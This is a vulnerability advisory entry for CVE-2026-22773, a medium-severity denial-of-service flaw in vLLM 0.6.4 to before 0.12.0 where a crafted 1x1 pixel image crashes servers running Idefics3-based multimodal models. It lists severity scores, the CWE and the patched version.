CVE-2026-22773

MEDIUM

Vllm < 0.12.0 - Resource Allocation Without Limits

Title source: rule
STIX 2.1

Description

vLLM is an inference and serving engine for large language models (LLMs). In versions from 0.6.4 to before 0.12.0, users can crash the vLLM engine serving multimodal models that use the Idefics3 vision model implementation by sending a specially crafted 1x1 pixel image. This causes a tensor dimension mismatch that results in an unhandled runtime error, leading to complete server termination. This issue has been patched in version 0.12.0.

Scores

CVSS v3 6.5
EPSS 0.0002
EPSS Percentile 5.8%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CISA SSVC

Vulnrichment
Exploitation none
Automatable no
Technical Impact partial

Details

CWE
CWE-770
Status published
Products (2)
pypi/vllm 0.6.4 - 0.12.0PyPI
vllm/vllm 0.6.4 - 0.12.0
Published Jan 10, 2026
Tracked Since Feb 18, 2026